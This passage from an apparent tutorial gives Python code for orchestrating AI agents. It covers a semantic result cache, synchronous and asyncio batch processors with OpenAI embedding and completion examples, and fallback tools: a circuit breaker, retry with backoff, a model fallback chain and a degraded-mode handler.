                logger.warning(f"Failed to compute embedding for cache key: {e}")

    def semantic_get(self, key: str) -> Tuple[bool, Any, float]:
        """
        Get an item from the cache using semantic matching.

        Args:
            key: Query string

        Returns:
            Tuple of (found, value, similarity)
        """
        # First try exact match
        exact_found, exact_value = self.get(key)
        if exact_found:
            return True, exact_value, 1.0

        # If not found, try semantic matching
        try:
            query_embedding = self.embedding_func(key)

            best_match = None
            best_similarity = 0

            with self.lock:
                for hashed_key, embedding in self.embedding_cache.items():
                    if hashed_key in self.cache:  # Ensure it's still in the cache
                        similarity = self._compute_similarity(query_embedding, embedding)

                        if similarity > best_similarity:
                            best_similarity = similarity
                            best_match = hashed_key

                # Check if we found a good match
                if best_match and best_similarity >= self.semantic_cache_threshold:
                    entry = self.cache[best_match]

                    # Check if expired
                    if entry.expires_at and time.time() > entry.expires_at:
                        return False, None, 0

                    self.metrics["semantic_hits"] += 1
                    self.metrics["total_cost_saved"] += entry.cost
                    return True, entry.value, best_similarity

            return False, None, best_similarity

        except Exception as e:
            logger.warning(f"Error in semantic matching: {e}")
            return False, None, 0

    def delete(self, key: Any) -> bool:
        """
        Delete an item from the cache.

        Args:
            key: Cache key

        Returns:
            True if item was deleted, False if not found
        """
        hashed_key = self._hash_key(key)

        with self.lock:
            if hashed_key in self.embedding_cache:
                del self.embedding_cache[hashed_key]

            if hashed_key in self.cache:
                del self.cache[hashed_key]
                return True
            return False

    def clear(self) -> None:
        """Clear all items from the cache."""
        with self.lock:
            self.cache.clear()
            self.embedding_cache.clear()

class AgentResultCache:
    """
    Specialized cache for AI agent results with support for partial results and
    context-aware caching.
    """

    def __init__(self,
                 embedding_func: Callable[[str], List[float]],
                 max_size: int = 5000,
                 default_ttl: int = 3600,
                 similarity_threshold: float = 0.92):
        """
        Initialize the agent result cache.

        Args:
            embedding_func: Function to convert text to vector embeddings
            max_size: Maximum cache size
            default_ttl: Default TTL in seconds
            similarity_threshold: Threshold for semantic matching
        """
        self.semantic_cache = SemanticCache(
            embedding_func=embedding_func,
            max_size=max_size,
            default_ttl=default_ttl,
            semantic_cache_threshold=similarity_threshold
        )
        self.context_cache = {}  # For context-specific caching

    def get_result(self,
                   query: str,
                   agent_type: str,
                   context: Optional[Dict[str, Any]] = None) -> Tuple[bool, Any, float]:
        """
        Get agent result from cache considering query, agent type, and context.

        Args:
            query: User query
            agent_type: Type of agent
            context: Optional context parameters

        Returns:
            Tuple of (found, result, similarity)
        """
        # Create cache key that includes agent type and essential context
        cache_key = self._create_cache_key(query, agent_type, context)

        # Try exact context match first
        exact_found, exact_result = self.semantic_cache.get(cache_key)
        if exact_found:
            return True, exact_result, 1.0

        # If not found, fall back to semantic matching on the query text alone.
        # Caveat: this lookup ignores agent_type and context, so it can return a
        # result that was stored for a different agent type or context.
        return self.semantic_cache.semantic_get(query)

    def store_result(self,
                     query: str,
                     agent_type: str,
                     result: Any,
                     context: Optional[Dict[str, Any]] = None,
                     ttl: Optional[int] = None,
                     cost: float = 0.0) -> None:
        """
        Store agent result in cache.

        Args:
            query: User query
            agent_type: Type of agent
            result: Agent result to cache
            context: Optional context parameters
            ttl: Optional TTL in seconds
            cost: Cost metric (e.g., tokens used)
        """
        # Create cache key
        cache_key = self._create_cache_key(query, agent_type, context)

        # Store in semantic cache
        self.semantic_cache.set(cache_key, result, ttl, cost)

        # Also store with query only for semantic matching
        self.semantic_cache.set(query, result, ttl, cost)

    def _create_cache_key(self,
                          query: str,
                          agent_type: str,
                          context: Optional[Dict[str, Any]]) -> str:
        """
        Create a cache key from query, agent type, and context.

        Args:
            query: User query
            agent_type: Type of agent
            context: Optional context parameters

        Returns:
            Cache key string
        """
        # Start with the query and agent type
        key_parts = [query, agent_type]

        # Add essential context parameters if provided
        if context:
            # Filter to include only cache-relevant context
            # This prevents minor context changes from invalidating the cache
            cache_relevant_keys = [
                'language', 'domain', 'persona', 'level',
                'format', 'length', 'temperature'
            ]

            relevant_context = {
                k: v for k, v in context.items()
                if k in cache_relevant_keys and v is not None
            }

            if relevant_context:
                # Sort to ensure consistent ordering
                context_str = json.dumps(relevant_context, sort_keys=True)
                key_parts.append(context_str)

        return "||".join(key_parts)

    def get_metrics(self) -> Dict[str, Any]:
        """Get cache metrics."""
        return self.semantic_cache.get_metrics()

    def clear(self) -> None:
        """Clear the cache."""
        self.semantic_cache.clear()
        self.context_cache.clear()
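
The semantic lookup path in the listing above can be tried in isolation. The following is a minimal, single-threaded sketch, not the classes from the listing: `TinySemanticCache`, `cosine_similarity`, `toy_embed`, and the hand-written `TOY_VECTORS` are all hypothetical names introduced for illustration, and a real deployment would call an embedding model instead of a lookup table. It shows only the core idea: embed the query, find the most similar stored key, and accept the match when the similarity reaches the threshold (0.92 here, mirroring the `similarity_threshold` default).

```python
import math
from typing import Any, Callable, List, Tuple


def cosine_similarity(a: List[float], b: List[float]) -> float:
    """Cosine similarity of two equal-length vectors; 0.0 if either is all zeros."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


class TinySemanticCache:
    """Hypothetical stand-in for the semantic lookup path (no TTL, no locking)."""

    def __init__(self, embedding_func: Callable[[str], List[float]], threshold: float = 0.92):
        self.embedding_func = embedding_func
        self.threshold = threshold
        self.entries: List[Tuple[List[float], Any]] = []

    def set(self, key: str, value: Any) -> None:
        # Store the key's embedding next to the cached value
        self.entries.append((self.embedding_func(key), value))

    def semantic_get(self, query: str) -> Tuple[bool, Any, float]:
        # Linear scan for the most similar stored key
        query_embedding = self.embedding_func(query)
        best_value, best_similarity = None, 0.0
        for embedding, value in self.entries:
            similarity = cosine_similarity(query_embedding, embedding)
            if similarity > best_similarity:
                best_value, best_similarity = value, similarity
        if best_similarity >= self.threshold:
            return True, best_value, best_similarity
        return False, None, best_similarity


# Assumption: hand-written toy vectors instead of a real embedding model
TOY_VECTORS = {
    "reset my password": [1.0, 0.0, 0.1],
    "how do I reset my password": [0.9, 0.1, 0.1],
    "weather in Paris": [0.0, 1.0, 0.0],
}


def toy_embed(text: str) -> List[float]:
    return TOY_VECTORS[text]


cache = TinySemanticCache(toy_embed, threshold=0.92)
cache.set("reset my password", "Use the account settings page.")
hit = cache.semantic_get("how do I reset my password")   # close paraphrase
miss = cache.semantic_get("weather in Paris")            # unrelated query
print(hit)
print(miss)
```

The linear scan costs one similarity computation per cached entry, which is acceptable for small caches; at larger sizes an approximate nearest-neighbor index would be the usual replacement.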

4. Batch Processing for Efficiency

python
# task_orchestration/batch_processor.py
import time
import threading
import asyncio
import logging
from typing import Dict, List, Any, Optional, Callable, Tuple, Generic, TypeVar
from dataclasses import dataclass, field
from queue import Queue

T = TypeVar('T')  # Input type
R = TypeVar('R')  # Result type

logger = logging.getLogger(__name__)

@dataclass
class BatchTask(Generic[T, R]):
    """A task to be processed in a batch."""
    id: str
    input: T
    callback: Callable[[str, R], None]
    # default_factory stamps each task when it is created; a plain time.time()
    # default would be evaluated only once, when the class is defined
    created_at: float = field(default_factory=time.time)

@dataclass
class BatchResult(Generic[R]):
    """Result of a batch operation."""
    results: Dict[str, R]
    batch_size: int
    processing_time: float

class BatchProcessor(Generic[T, R]):
    """
    Processes tasks in batches for more efficient API calls.
    """

    def __init__(self,
                 batch_processor_func: Callable[[List[T]], Dict[int, R]],
                 max_batch_size: int = 20,
                 max_wait_time: float = 0.1,
                 min_batch_size: int = 1):
        """
        Initialize the batch processor.

        Args:
            batch_processor_func: Function that processes a batch of inputs
            max_batch_size: Maximum batch size
            max_wait_time: Maximum wait time in seconds before processing a batch
            min_batch_size: Minimum batch size to process
        """
        self.batch_processor_func = batch_processor_func
        self.max_batch_size = max_batch_size
        self.max_wait_time = max_wait_time
        self.min_batch_size = min_batch_size

        # Initialize all state before starting the worker thread that uses it
        self.metrics = {
            "total_items_processed": 0,
            "total_batches_processed": 0,
            "avg_batch_size": 0,
            "avg_wait_time": 0,
            "avg_processing_time": 0
        }

        self.queue = Queue()
        self.processing_thread = threading.Thread(target=self._processing_loop, daemon=True)
        self.processing_thread.start()

    def submit(self, task_id: str, input_item: T,
               callback: Callable[[str, R], None]) -> None:
        """
        Submit a task for batch processing.

        Args:
            task_id: Unique ID for the task
            input_item: Input to process
            callback: Function to call with the result
        """
        task = BatchTask(id=task_id, input=input_item, callback=callback)
        self.queue.put(task)

    def _processing_loop(self) -> None:
        """Main processing loop that gathers tasks into batches."""
        from queue import Empty  # raised by a non-blocking get on an empty queue

        while True:
            batch = []

            # Get first item (blocking)
            first_item = self.queue.get()
            batch.append(first_item)

            # Start the clock once the first item arrives so that idle time
            # between batches is not counted as batch wait time
            start_wait = time.time()

            # Try to fill batch up to max_batch_size or until max_wait_time
            batch_timeout = start_wait + self.max_wait_time

            while len(batch) < self.max_batch_size and time.time() < batch_timeout:
                try:
                    # Non-blocking queue get
                    item = self.queue.get(block=False)
                    batch.append(item)
                except Empty:
                    # No more items available now
                    if len(batch) >= self.min_batch_size:
                        # We have enough items, process now
                        break

                    # Not enough items, wait a bit
                    time.sleep(0.01)

            wait_time = time.time() - start_wait

            # Process the batch
            self._process_batch(batch, wait_time)

    def _process_batch(self, batch: List[BatchTask[T, R]], wait_time: float) -> None:
        """
        Process a batch of tasks.

        Args:
            batch: List of tasks to process
            wait_time: Time spent waiting for the batch to fill
        """
        if not batch:
            return

        try:
            # Inputs keep batch order, so result index i belongs to batch[i].
            # Indexing by position also stays correct if two tasks share an ID.
            inputs = [task.input for task in batch]

            # Process the batch
            start_time = time.time()

            # The batch processor function should return results mapped by index
            index_results = self.batch_processor_func(inputs)

            processing_time = time.time() - start_time

            # Map results back to tasks and call callbacks
            for index, task in enumerate(batch):
                result = index_results.get(index)

                try:
                    task.callback(task.id, result)
                except Exception as e:
                    logger.error(f"Error in callback for task {task.id}: {e}")

            # Update metrics
            batch_size = len(batch)
            self.metrics["total_items_processed"] += batch_size
            self.metrics["total_batches_processed"] += 1

            # Update running averages over all batches processed so far
            n = self.metrics["total_batches_processed"]
            self.metrics["avg_batch_size"] = (
                (self.metrics["avg_batch_size"] * (n - 1) + batch_size) / n
            )
            self.metrics["avg_wait_time"] = (
                (self.metrics["avg_wait_time"] * (n - 1) + wait_time) / n
            )
            self.metrics["avg_processing_time"] = (
                (self.metrics["avg_processing_time"] * (n - 1) + processing_time) / n
            )

            logger.debug(f"Processed batch of {batch_size} items in {processing_time:.3f}s")

        except Exception as e:
            logger.error(f"Error processing batch: {e}")

            # Call callbacks with None for all tasks to signal the failure
            for task in batch:
                try:
                    task.callback(task.id, None)
                except Exception as callback_error:
                    logger.error(f"Error in error callback for task {task.id}: {callback_error}")

    def get_metrics(self) -> Dict[str, Any]:
        """Get processor metrics."""
        metrics = self.metrics.copy()
        metrics["queue_size"] = self.queue.qsize()
        return metrics

class AsyncBatchProcessor(Generic[T, R]):
    """
    Asynchronous version of the batch processor for use with asyncio.
    """

    def __init__(self,
                 batch_processor_func: Callable[[List[T]], Dict[int, R]],
                 max_batch_size: int = 20,
                 max_wait_time: float = 0.1,
                 min_batch_size: int = 1):
        """
        Initialize the async batch processor.

        Args:
            batch_processor_func: Function that processes a batch of inputs
            max_batch_size: Maximum batch size
            max_wait_time: Maximum wait time in seconds before processing a batch
            min_batch_size: Minimum batch size to process
        """
        self.batch_processor_func = batch_processor_func
        self.max_batch_size = max_batch_size
        self.max_wait_time = max_wait_time
        self.min_batch_size = min_batch_size

        self.queue = asyncio.Queue()
        self.processing_task = None

        self.metrics = {
            "total_items_processed": 0,
            "total_batches_processed": 0,
            "avg_batch_size": 0,
            "avg_wait_time": 0,
            "avg_processing_time": 0
        }

    async def start(self) -> None:
        """Start the processing task."""
        if not self.processing_task:
            self.processing_task = asyncio.create_task(self._processing_loop())

    async def stop(self) -> None:
        """Stop the processing task."""
        if self.processing_task:
            self.processing_task.cancel()
            try:
                await self.processing_task
            except asyncio.CancelledError:
                pass
            self.processing_task = None

    async def submit(self, task_id: str, input_item: T) -> R:
        """
        Submit a task for batch processing and await the result.

        Args:
            task_id: Unique ID for the task
            input_item: Input to process

        Returns:
            Processing result
        """
        # Create a future on the running event loop to carry the result
        result_future = asyncio.get_running_loop().create_future()

        # Define callback that resolves the future
        def callback(task_id: str, result: R) -> None:
            if not result_future.done():
                result_future.set_result(result)

        # Create task
        task = BatchTask(id=task_id, input=input_item, callback=callback)

        # Submit to queue
        await self.queue.put(task)

        # Start processing if not already started
        if not self.processing_task:
            await self.start()

        # Wait for result
        return await result_future

    async def _processing_loop(self) -> None:
        """Main processing loop that gathers tasks into batches."""
        while True:
            batch = []

            # Get first item (suspends until one is available)
            first_item = await self.queue.get()
            batch.append(first_item)

            # Start the clock once the first item arrives so that idle time
            # between batches is not counted as batch wait time
            start_wait = time.time()

            # Try to fill batch up to max_batch_size or until max_wait_time
            batch_timeout = start_wait + self.max_wait_time

            while len(batch) < self.max_batch_size and time.time() < batch_timeout:
                try:
                    # Non-blocking queue get
                    item = self.queue.get_nowait()
                    batch.append(item)
                except asyncio.QueueEmpty:
                    # No more items available now
                    if len(batch) >= self.min_batch_size:
                        # We have enough items, process now
                        break

                    # Not enough items, wait a bit
                    await asyncio.sleep(0.01)

            wait_time = time.time() - start_wait

            # Process the batch
            await self._process_batch(batch, wait_time)

    async def _process_batch(self, batch: List[BatchTask[T, R]], wait_time: float) -> None:
        """
        Process a batch of tasks.

        Args:
            batch: List of tasks to process
            wait_time: Time spent waiting for the batch to fill
        """
        if not batch:
            return

        try:
            # Inputs keep batch order, so result index i belongs to batch[i].
            # Indexing by position also stays correct if two tasks share an ID.
            inputs = [task.input for task in batch]

            # Process the batch
            start_time = time.time()

            # Await the function directly if it is a coroutine function
            if asyncio.iscoroutinefunction(self.batch_processor_func):
                index_results = await self.batch_processor_func(inputs)
            else:
                # Otherwise run the blocking function in a worker thread
                # (asyncio.to_thread requires Python 3.9+)
                index_results = await asyncio.to_thread(self.batch_processor_func, inputs)

            processing_time = time.time() - start_time

            # Map results back to tasks and call callbacks
            for index, task in enumerate(batch):
                result = index_results.get(index)
                task.callback(task.id, result)

            # Update metrics
            batch_size = len(batch)
            self.metrics["total_items_processed"] += batch_size
            self.metrics["total_batches_processed"] += 1

            # Update running averages over all batches processed so far
            n = self.metrics["total_batches_processed"]
            self.metrics["avg_batch_size"] = (
                (self.metrics["avg_batch_size"] * (n - 1) + batch_size) / n
            )
            self.metrics["avg_wait_time"] = (
                (self.metrics["avg_wait_time"] * (n - 1) + wait_time) / n
            )
            self.metrics["avg_processing_time"] = (
                (self.metrics["avg_processing_time"] * (n - 1) + processing_time) / n
            )

            logger.debug(f"Processed batch of {batch_size} items in {processing_time:.3f}s")

        except Exception as e:
            logger.error(f"Error processing batch: {e}")

            # Call callbacks with None for all tasks to signal the failure
            for task in batch:
                try:
                    task.callback(task.id, None)
                except Exception as callback_error:
                    logger.error(f"Error in error callback for task {task.id}: {callback_error}")

    def get_metrics(self) -> Dict[str, Any]:
        """Get processor metrics."""
        metrics = self.metrics.copy()
        metrics["queue_size"] = self.queue.qsize()
        return metrics

# Example usage with OpenAI embeddings
async def openai_embedding_batch_processor(texts: List[str]) -> Dict[int, List[float]]:
    """
    Process a batch of texts into embeddings using OpenAI API.

    Args:
        texts: List of texts to embed

    Returns:
        Dictionary mapping input indices to embedding vectors
    """
    # Note: this example uses the legacy (pre-1.0) openai SDK interface
    import openai

    try:
        # Make the API call with all texts at once
        response = await openai.Embedding.acreate(
            model="text-embedding-ada-002",
            input=texts
        )

        # Map results back to original indices using each item's index field
        results = {}
        for embedding_data in response.data:
            results[embedding_data.index] = embedding_data.embedding

        return results

    except Exception as e:
        logger.error(f"Error in batch embedding: {e}")
        return {}

# Example usage with LLM completions
async def openai_completion_batch_processor(prompts: List[str]) -> Dict[int, str]:
    """
    Process a batch of prompts into completions using OpenAI API.

    Args:
        prompts: List of prompts

    Returns:
        Dictionary mapping input indices to completion strings
    """
    # Note: this example uses the legacy (pre-1.0) openai SDK interface
    import openai

    try:
        # Create a single API call with multiple prompts.
        # text-davinci-003 has been retired; gpt-3.5-turbo-instruct is the
        # replacement model for the completions endpoint.
        response = await openai.Completion.acreate(
            model="gpt-3.5-turbo-instruct",
            prompt=prompts,
            max_tokens=100,
            n=1,
            temperature=0.7
        )

        # Map results back to original indices. Choices are not guaranteed to
        # arrive in prompt order, so match on each choice's index field.
        results = {}
        for choice in response.choices:
            results[choice.index] = choice.text.strip()

        return results

    except Exception as e:
        logger.error(f"Error in batch completion: {e}")
        return {}
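
To see the coalescing behaviour without an API key, the asyncio pattern above can be reduced to a small, self-contained sketch. This is an illustration under stated assumptions rather than the listing's `AsyncBatchProcessor`: the names `MicroBatcher`, `fake_embed_batch`, and `demo` are hypothetical, the batch function returns a list in input order instead of an index-keyed dictionary, and failures are propagated to callers as exceptions instead of `None`.

```python
import asyncio
from typing import Any, Awaitable, Callable, List, Optional, Tuple


class MicroBatcher:
    """Hypothetical minimal batcher: concurrent submit() calls share one batch call."""

    def __init__(self,
                 batch_func: Callable[[List[Any]], Awaitable[List[Any]]],
                 max_batch_size: int = 8,
                 max_wait_time: float = 0.05):
        self.batch_func = batch_func
        self.max_batch_size = max_batch_size
        self.max_wait_time = max_wait_time
        self.queue: asyncio.Queue = asyncio.Queue()
        self.worker: Optional[asyncio.Task] = None

    async def submit(self, item: Any) -> Any:
        if self.worker is None:
            self.worker = asyncio.create_task(self._run())
        future = asyncio.get_running_loop().create_future()
        await self.queue.put((item, future))
        return await future

    async def _run(self) -> None:
        loop = asyncio.get_running_loop()
        while True:
            # Block for the first item, then collect more until the deadline
            batch = [await self.queue.get()]
            deadline = loop.time() + self.max_wait_time
            while len(batch) < self.max_batch_size:
                remaining = deadline - loop.time()
                if remaining <= 0:
                    break
                try:
                    batch.append(await asyncio.wait_for(self.queue.get(), remaining))
                except asyncio.TimeoutError:
                    break
            try:
                results = await self.batch_func([item for item, _ in batch])
                for (_, future), result in zip(batch, results):
                    if not future.done():
                        future.set_result(result)
            except Exception as exc:
                # Propagate the failure to every caller in the batch
                for _, future in batch:
                    if not future.done():
                        future.set_exception(exc)

    async def close(self) -> None:
        if self.worker is not None:
            self.worker.cancel()
            try:
                await self.worker
            except asyncio.CancelledError:
                pass
            self.worker = None


async def demo() -> Tuple[List[int], List[int]]:
    batch_sizes: List[int] = []

    async def fake_embed_batch(texts: List[str]) -> List[int]:
        # Stand-in for a real batched API call: records the batch size
        batch_sizes.append(len(texts))
        return [len(text) for text in texts]

    batcher = MicroBatcher(fake_embed_batch, max_batch_size=8, max_wait_time=0.05)
    results = await asyncio.gather(*(batcher.submit(t) for t in ["a", "bb", "ccc", "dddd"]))
    await batcher.close()
    return list(results), batch_sizes


if __name__ == "__main__":
    print(asyncio.run(demo()))
```

Waiting on the queue with a timeout, instead of polling with short sleeps, lets the worker wake as soon as an item arrives while still bounding the added latency by `max_wait_time`.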

5. Implementing Graceful Degradation and Fallbacks

python
# task_orchestration/fallback_strategies.py
import time
import random
import logging
from typing import Dict, List, Any, Optional, Callable, TypeVar, Generic, Union

T = TypeVar('T')  # Input type
R = TypeVar('R')  # Result type

logger = logging.getLogger(__name__)

class CircuitBreaker:
    """
    Circuit breaker pattern implementation to prevent cascading failures.
    """

    CLOSED = "closed"  # Normal operation, requests go through
    OPEN = "open"  # Circuit is open, requests fail fast
    HALF_OPEN = "half_open"  # Testing if service is back to normal

    def __init__(self,
                 failure_threshold: int = 5,
                 reset_timeout: float = 60.0,
                 half_open_max_calls: int = 1):
        """
        Initialize circuit breaker.

        Args:
            failure_threshold: Number of failures before opening the circuit
            reset_timeout: Time in seconds before attempting to reset circuit
            half_open_max_calls: Maximum number of calls allowed in half-open state
        """
        self.failure_threshold = failure_threshold
        self.reset_timeout = reset_timeout
        self.half_open_max_calls = half_open_max_calls

        self.state = self.CLOSED
        self.failure_count = 0
        self.last_failure_time = 0
        self.half_open_calls = 0

    def __call__(self, func):
        """
        Decorator for functions that should use circuit breaker.

        Args:
            func: Function to wrap

        Returns:
            Wrapped function
        """
        def wrapper(*args, **kwargs):
            return self.execute(func, *args, **kwargs)
        return wrapper

    def execute(self, func, *args, **kwargs):
        """
        Execute function with circuit breaker protection.

        Args:
            func: Function to execute
            *args, **kwargs: Arguments to pass to the function

        Returns:
            Result of the function or raises exception if circuit is open

        Raises:
            CircuitBreakerOpenError: If circuit is open
        """
        if self.state == self.OPEN:
            if time.time() - self.last_failure_time >= self.reset_timeout:
                logger.info("Circuit half-open, allowing test request")
                self.state = self.HALF_OPEN
                self.half_open_calls = 0
            else:
                raise CircuitBreakerOpenError(f"Circuit breaker is open until {self.last_failure_time + self.reset_timeout}")

        if self.state == self.HALF_OPEN and self.half_open_calls >= self.half_open_max_calls:
            raise CircuitBreakerOpenError("Circuit breaker is half-open and at call limit")

        try:
            if self.state == self.HALF_OPEN:
                self.half_open_calls += 1

            result = func(*args, **kwargs)

            # Success: close the circuit if this was a half-open test call
            if self.state == self.HALF_OPEN:
                logger.info("Success in half-open state, closing circuit")
                self.state = self.CLOSED

            # Clear the count on every success so that only consecutive
            # failures, not failures spread over time, can open the circuit
            self.failure_count = 0

            return result

        except Exception as e:
            self._handle_failure(e)
            raise

    def _handle_failure(self, exception):
        """
        Handle a failure by updating circuit state.

        Args:
            exception: The exception that occurred
        """
        self.failure_count += 1
        self.last_failure_time = time.time()

        if self.state == self.HALF_OPEN or self.failure_count >= self.failure_threshold:
            logger.warning(f"Circuit breaker opening due to {self.failure_count} failures")
            self.state = self.OPEN

    def reset(self):
        """Reset the circuit breaker to closed state."""
        self.state = self.CLOSED
        self.failure_count = 0
        self.half_open_calls = 0

    def get_state(self) -> Dict[str, Any]:
        """Get the current state of the circuit breaker."""
        return {
            "state": self.state,
            "failure_count": self.failure_count,
            "last_failure_time": self.last_failure_time,
            "half_open_calls": self.half_open_calls,
            "reset_time": self.last_failure_time + self.reset_timeout if self.state == self.OPEN else None
        }

class CircuitBreakerOpenError(Exception):
    """Error raised when circuit breaker is open."""
    pass

class RetryStrategy:
    """
    Retry strategy with exponential backoff and jitter.
    """

    def __init__(self,
                 max_retries: int = 3,
                 base_delay: float = 1.0,
                 max_delay: float = 60.0,
                 jitter: bool = True,
                 retry_on: Optional[List[type]] = None):
        """
        Initialize retry strategy.

        Args:
            max_retries: Maximum number of retries
            base_delay: Base delay in seconds
            max_delay: Maximum delay in seconds
            jitter: Whether to add randomness to delay
            retry_on: List of exception types to retry on, or None for all
        """
        self.max_retries = max_retries
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.jitter = jitter
        self.retry_on = retry_on

    def __call__(self, func):
        """
        Decorator for functions that should use retry strategy.

        Args:
            func: Function to wrap

        Returns:
            Wrapped function
        """
        def wrapper(*args, **kwargs):
            return self.execute(func, *args, **kwargs)
        return wrapper

    def execute(self, func, *args, **kwargs):
        """
        Execute function with retry strategy.

        Args:
            func: Function to execute
            *args, **kwargs: Arguments to pass to the function

        Returns:
            Result of the function

        Raises:
            Exception: The last exception if all retries fail
        """
        last_exception = None

        for attempt in range(self.max_retries + 1):
            try:
                return func(*args, **kwargs)
            except Exception as e:
                last_exception = e

                # Check if we should retry this exception
                if self.retry_on and not any(isinstance(e, ex_type) for ex_type in self.retry_on):
                    logger.debug(f"Not retrying exception {type(e).__name__} as it's not in retry_on list")
                    raise

                if attempt == self.max_retries:
                    logger.warning(f"Max retries ({self.max_retries}) reached, raising last exception")
                    raise

                # Calculate delay with exponential backoff
                delay = min(self.max_delay, self.base_delay * (2 ** attempt))

                # Add jitter if enabled (prevents thundering herd problem)
                if self.jitter:
                    delay = delay * (0.5 + random.random())

                logger.info(f"Retry {attempt+1}/{self.max_retries} after {delay:.2f}s due to {type(e).__name__}: {str(e)}")
                time.sleep(delay)

        # This should never be reached, but just in case
        raise last_exception if last_exception else RuntimeError("Retry strategy failed")

class FallbackStrategy(Generic[T, R]):
    """
    Fallback strategy that tries alternative approaches if primary fails.
    """

    def __init__(self,
                 fallbacks: List[Callable[[T], R]],
                 should_fallback: Optional[Callable[[Exception], bool]] = None):
        """
        Initialize fallback strategy.

        Args:
            fallbacks: List of fallback functions to try
            should_fallback: Optional function to decide if fallback should be used
        """
        self.fallbacks = fallbacks
        self.should_fallback = should_fallback

    def __call__(self, primary_func):
        """
        Decorator for functions that should use fallback strategy.

        Args:
            primary_func: Primary function to wrap

        Returns:
            Wrapped function
        """
        def wrapper(*args, **kwargs):
            return self.execute(primary_func, *args, **kwargs)
        return wrapper

    def execute(self, primary_func, *args, **kwargs):
        """
        Execute primary function with fallbacks if needed.

        Args:
            primary_func: Primary function to execute
            *args, **kwargs: Arguments to pass to the function

        Returns:
            Result of the primary function or a fallback

        Raises:
            Exception: If all fallbacks fail
        """
        # Try primary function first
        try:
            return primary_func(*args, **kwargs)
        except Exception as primary_exception:
            # Check if we should fallback
            if self.should_fallback and not self.should_fallback(primary_exception):
                logger.debug(f"Not using fallback for {type(primary_exception).__name__}: {str(primary_exception)}")
                raise

            logger.info(f"Primary function failed with {type(primary_exception).__name__}, trying fallbacks")

            # Try each fallback
            last_exception = primary_exception

            for i, fallback in enumerate(self.fallbacks):
                try:
                    logger.info(f"Trying fallback {i+1}/{len(self.fallbacks)}")
                    return fallback(*args, **kwargs)
                except Exception as fallback_exception:
                    logger.warning(f"Fallback {i+1} failed with {type(fallback_exception).__name__}: {str(fallback_exception)}")
                    last_exception = fallback_exception

            # All fallbacks failed
            logger.error("All fallbacks failed")
            raise last_exception

class ModelFallbackChain:
    """
    Chain of LLM models to try, falling back to less capable models if primary fails.
    """

    def __init__(self, model_configs: List[Dict[str, Any]]):
        """
        Initialize the model fallback chain.

        Args:
            model_configs: List of model configurations in priority order
        """
        self.model_configs = model_configs

    async def generate(self,
                       prompt: str,
                       max_tokens: int = 1000,
                       temperature: float = 0.7) -> Dict[str, Any]:
        """
        Generate a response using the model chain.

        Args:
            prompt: Text prompt
            max_tokens: Maximum tokens to generate
            temperature: Temperature for generation

        Returns:
            Response with text and metadata

        Raises:
            Exception: If all models fail
        """
        import asyncio  # local import, needed for the non-blocking backoff below
        import openai

        last_exception = None
        for i, config in enumerate(self.model_configs):
            model = config["model"]
            timeout = config.get("timeout", 60)
            retry_count = config.get("retry_count", 1)

            logger.info(f"Trying model {i+1}/{len(self.model_configs)}: {model}")

            for attempt in range(retry_count):
                try:
                    start_time = time.time()

                    response = await openai.ChatCompletion.acreate(
                        model=model,
                        messages=[{"role": "user", "content": prompt}],
                        max_tokens=max_tokens,
                        temperature=temperature,
                        timeout=timeout
                    )

                    generation_time = time.time() - start_time

                    return {
                        "text": response.choices[0].message.content,
                        "model_used": model,
                        "generation_time": generation_time,
                        "fallback_level": i,
                        "was_fallback": i > 0
                    }

                except Exception as e:
                    last_exception = e
                    logger.warning(f"Model {model} attempt {attempt+1}/{retry_count} failed: {str(e)}")

                    # Add exponential backoff between retries. Use asyncio.sleep
                    # here: time.sleep would block the event loop in a coroutine.
                    if attempt < retry_count - 1:
                        backoff = (2 ** attempt) * 0.5 * (0.5 + random.random())
                        await asyncio.sleep(backoff)

        # All models failed
        logger.error("All models in fallback chain failed")
        raise last_exception if last_exception else RuntimeError("All models failed")

class DegradedModeHandler:
    """
    Handler for operating in degraded mode when resources are limited.
    """

    NORMAL = "normal"
    DEGRADED = "degraded"
    CRITICAL = "critical"

    def __init__(self, degradation_threshold: float = 0.7, critical_threshold: float = 0.9):
        """
        Initialize the degraded mode handler.

        Args:
            degradation_threshold: Resource usage threshold for degraded mode
            critical_threshold: Resource usage threshold for critical mode
        """
        self.degradation_threshold = degradation_threshold
        self.critical_threshold = critical_threshold
        self.current_mode = self.NORMAL
        self.resource_usage = 0.0

    def update_resource_usage(self, usage: float) -> None:
        """
        Update current resource usage and mode.

        Args:
            usage: Current resource usage (0-1)
        """
        self.resource_usage = usage

        # Update mode based on resource usage
        if usage >= self.critical_threshold:
            if self.current_mode != self.CRITICAL:
                logger.warning(f"Entering CRITICAL mode (resource usage: {usage:.2f})")
            self.current_mode = self.CRITICAL
        elif usage >= self.degradation_threshold:
            if self.current_mode == self.NORMAL:
                logger.warning(f"Entering DEGRADED mode (resource usage: {usage:.2f})")
            self.current_mode = self.DEGRADED
        else:
            if self.current_mode != self.NORMAL:
                logger.info(f"Returning to NORMAL mode (resource usage: {usage:.2f})")
            self.current_mode = self.NORMAL

    def get_agent_config(self, agent_type: str) -> Dict[str, Any]:
        """
        Get configuration for an agent based on current mode.

        Args:
            agent_type: Type of agent

        Returns:
            Agent configuration
        """
        # Base configuration
        base_config = {
            "max_tokens": 4000,
            "temperature": 0.7,
            "timeout": 60,
            "stream": True
        }

        if self.current_mode == self.NORMAL:
            # Normal mode - use best models
            return {
                **base_config,
                "model": "gpt-4-turbo",
                "max_tokens": 4000
            }

        elif self.current_mode == self.DEGRADED:
            # Degraded mode - use more efficient models and cap output length.
            # Temperature stays at the base value: it changes sampling
            # randomness, not token usage, so raising it saves nothing.
            return {
                **base_config,
                "model": "gpt-3.5-turbo",
                "max_tokens": 2000
            }

        else:  # CRITICAL mode
            # Critical mode - most restrictive
            return {
                **base_config,
                "model": "gpt-3.5-turbo",
                "max_tokens": 1000,
                "timeout": 30,
                "stream": False  # Disable streaming to reduce connection overhead
            }

458 def should_cache_result(self) -> bool:
459 """Determine if results should be cached based on current mode."""
460 # Always cache in degraded or critical mode
461 return self.current_mode != self.NORMAL
462
463 def should_use_cached_result(self, similarity: float) -> bool:
464 """
465 Determine if cached results should be used based on current mode.
466
467 Args:
468 similarity: Similarity score of cached result (0-1)
469
470 Returns:
471 True if cached result should be used
472 """
473 if self.current_mode == self.NORMAL:
